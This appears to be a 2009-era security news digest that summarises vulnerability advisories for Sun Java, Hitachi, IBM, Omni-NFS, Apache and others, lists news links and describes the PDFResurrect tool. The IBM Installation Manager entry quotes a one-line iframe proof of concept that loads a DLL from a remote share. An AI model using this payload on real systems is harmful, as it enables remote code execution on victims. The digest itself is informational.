Vulnerabilities of Interest:
- file CDF File Parsing Multiple Buffer Overflow Vulnerabilities – The ‘file’ command is prone to multiple buffer-overflow vulnerabilities because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Versions prior to ‘file’ 5.02 are vulnerable.
- Sun Java Runtime Environment Multiple Unspecified Same Origin Policy Violation Vulnerabilities – Sun Java Runtime Environment is prone to multiple unspecified vulnerabilities that allow attackers to bypass the same-origin policy. This issue occurs because the application fails to properly enforce the same-origin policy for Java applets. An attacker may create a malicious applet that is loaded from a remote system to circumvent network access restrictions. The following are affected: JDK and JRE 6 Update 6 and earlier, JDK and JRE 5.0 Update 15 and earlier, SDK and JRE 1.4.2_17 and earlier SDK and JRE 1.3.x_22 and earlier
- Sun Java Runtime Environment XML Data Processing Multiple Vulnerabilities – Sun Java Runtime Environment is prone to multiple remote vulnerabilities. An attacker can exploit these issues to obtain sensitive information or crash the affected application, denying service to legitimate users. These issues affect the following versions on Solaris, Linux, and Windows platforms: JDK and JRE 6 Update 6 and earlier as well as JDK and JRE 5.0 Update 15 and earlier
- Sun Java SE Java Management Extensions (JMX) Unspecified Unauthorized Access Vulnerability – JMX is prone to an unspecified unauthorized-access vulnerability. The vulnerability allows a JMX client to perform unauthorized actions on a computer running JMX with local monitoring enabled. The issue affects the following versions for Windows, Solaris, and Linux: JDK and JRE 6 Update 6 and earlier as well as JDK and JRE 5.0 Update 15 and earlier
- Sun Java Runtime Environment Virtual Machine Privilege Escalation Vulnerability – Sun Java Runtime Environment Virtual Machine is prone to a privilege-escalation vulnerability when running untrusted applications or applets. Successful exploits may allow attackers to read, write, or execute arbitrary local files in the context of the user running an untrusted application in the affected virtual machine. This may result in a compromise of the underlying system. This issue affects the following versions: JDK and JRE 6 Update 6 and earlier, JDK and JRE 5.0 Update 15 and earlier SDK and JRE 1.4.2_17 and earlier
- Hitachi Multiple Products Remote Code Execution Vulnerabilities – Multiple products from Hitachi are prone to multiple code-execution vulnerabilities. A remote attacker could exploit these issues by enticing a victim to open a malicious file. Successfully exploiting these issues would allow the attacker to execute arbitrary code in the context of the currently logged-in user or cause denial-of-service conditions.
- IBM Installation Manager ‘iim://’ URI Handling Remote Code Execution Vulnerability – IBM Installation Manager is prone to a remote code-execution vulnerability. Attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions. The following products that include Installation Manager are vulnerable: IBM Rational Robot and IBM Rational Team Concer. The following proof of concept is available: <iframe src=’iim://” -vm \\www.example.com\uncshare\sh.dll -url “‘></iframe> Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
- Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities – Omni-NFS is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied network data before copying it into an insufficiently sized memory buffer. The issues affect both server and client. Exploiting these issues allows attackers to execute arbitrary machine code in the context of users running the affected application. Failed attempts will likely crash the application, resulting in denial-of-service conditions. Omni-NFS 5.2 is vulnerable; other versions may also be affected. Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. There are also exploits are available in the wild.
- Hitachi Device Manager IPv6 Security Bypass Vulnerability – Hitachi Device Manager and JP1/HiCommand are prone to a security-bypass vulnerability because of an unspecified error related to IPv6 functionality. Very few technical details are available as of now though we will continue to monitor this one. Hitachi Multiple Products GIF File Parsing Buffer Overflow Vulnerability – Multiple Hitachi products, including Cosminexus, Processing Kit for XML, and Hitachi Developer’s Kit for Java, are prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
- Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability – The Apache ‘mod_proxy_ftp’ module is prone to a denial-of-service vulnerability because of a NULL-pointer dereference. Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. A working commercial exploit is available through Intevydis otherwise no publicly available or known to be circulating in the wild.
- WebKit Preflight Request Same-Origin Policy Bypass Vulnerability – WebKit is prone to a vulnerability that lets attackers bypass the same-origin policy. Attackers can exploit this issue to access resources from another origin in the context of another domain. This can facilitate cross-site request-forgery attacks.
- Sun Solaris Samba Information Disclosure and Denial of Service – Sun has acknowledged some vulnerabilities in Samba in Solaris, which can be exploited by malicious users to disclose sensitive information and cause a DoS (Denial of Service).
News Items of Interest:
News item 1: (http://www.theglobeandmail.com/news/technology/rim-security-chief-warns-of-future-smart-phone-attacks/article1368297/)
News item 2: (http://www.h-online.com/security/news/item/Fedora-12-allows-users-install-privilege-Update-863623.html)
News item 3: (http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1374839,00.html)
News item 4: (http://www.reuters.com/article/rbssTechMediaTelecomNews/idUSPEK26455220091119?rpc=401)
News item 5: (http://www.cio.com/article/508029/How_to_Hack_China_for_Just_1_800?source=rss_security)
News item 6: (http://www.informationweek.com/news/government/policy/showArticle.jhtml?articleID=221900107)
Tech Segment:
PDFResurrect is a tool aimed at analyzing PDF documents. The PDF format allows for previous document changes to be retained in a more recent version of the document, thereby creating a running history of changes for the document. This tool attempts to extract all previous versions while also producing a summary of changes between versions. This tool can also “scrub” or write data over the original instances of PDF objects that have been modified or deleted, in an effort to disguise information from previous versions that might not be intended for anyone else to read.
This project is released under the GNU GPLv3 license. So have at it!